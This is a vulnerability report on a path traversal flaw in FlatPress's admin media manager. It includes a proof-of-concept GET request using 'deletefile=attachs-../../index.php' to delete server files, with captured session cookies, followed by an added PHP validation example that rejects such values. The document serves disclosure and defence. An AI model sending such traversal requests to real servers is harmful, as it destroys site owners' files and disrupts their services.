File Deletion Detected in flatpressblog/flatpress
Reported on
Dec 24th 2022
Description
The vulnerability allows deleting files on the server, which can alter the logic of the source code or disrupt the application's normal operation.
Proof of Concept
B1. Log in and open admin.php?p=uploader&action=mediamanager
B2. Delete one uploaded file
B3. Change the parameter to `deletefile=attachs-{file path}`
Example: delete the file index.php
GET /flatpress-master/admin.php?p=uploader&action=mediamanager&deletefile=attachs-../../index.php HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/flatpress-master/admin.php?p=uploader&action=mediamanager
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; PHPSESSID=69js8mspjvh35iaud5vsb2sdfq; security_level=0; fpsess_fp-a37b0eea=81ft5fe9s1evbo5kaovh623v8u
Connection: close
Impact
The vulnerability allows deleting files on the server, which can alter the logic of the source code or disrupt the application's normal operation.
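A containment check of the kind that rejects the `deletefile=attachs-../../index.php` value from the proof of concept, given as an added example (it is not FlatPress code and not part of the original report). The function name `resolve_deletable`, the `fp-content/attachs` directory layout and the prefix-to-directory mapping are assumptions made for the demonstration.

```php
<?php
// Added example, not FlatPress code. Resolves a "deletefile" value such as
// "attachs-photo.jpg" to a path, or returns null if it leaves the upload directory.
function resolve_deletable(string $param, array $baseDirs): ?string
{
    // Expect "<prefix>-<relative path>"; the prefix must name an allowed base directory.
    if (!preg_match('/^([a-z]+)-(.+)$/s', $param, $m) || !isset($baseDirs[$m[1]])) {
        return null;
    }
    if (strpos($m[2], "\0") !== false) {   // reject embedded NUL bytes up front
        return null;
    }
    $base = realpath($baseDirs[$m[1]]);
    // realpath() collapses "../" and symlinks; it returns false if the path does not exist.
    $target = realpath($baseDirs[$m[1]] . DIRECTORY_SEPARATOR . $m[2]);
    if ($base === false || $target === false || !is_file($target)) {
        return null;
    }
    // Containment check: the resolved file must sit below the base directory.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed layout mirroring the PoC: upload directory two levels below the web root.
$root = sys_get_temp_dir() . '/fp_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/fp-content/attachs', 0700, true);
file_put_contents($root . '/index.php', '<?php // constructed');
file_put_contents($root . '/fp-content/attachs/photo.jpg', 'constructed');
$dirs = ['attachs' => $root . '/fp-content/attachs'];   // assumed prefix mapping

foreach (['attachs-photo.jpg', 'attachs-../../index.php', 'other-photo.jpg'] as $value) {
    $path = resolve_deletable($value, $dirs);
    echo str_pad($value, 26), $path === null ? "rejected\n" : "allowed\n";
}

// Remove the constructed files again.
unlink($root . '/fp-content/attachs/photo.jpg');
unlink($root . '/index.php');
rmdir($root . '/fp-content/attachs');
rmdir($root . '/fp-content');
rmdir($root);
```

A delete handler would call `unlink()` only on the path this function returns, never on the raw request parameter.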
a year ago
good find, thanks for reporting!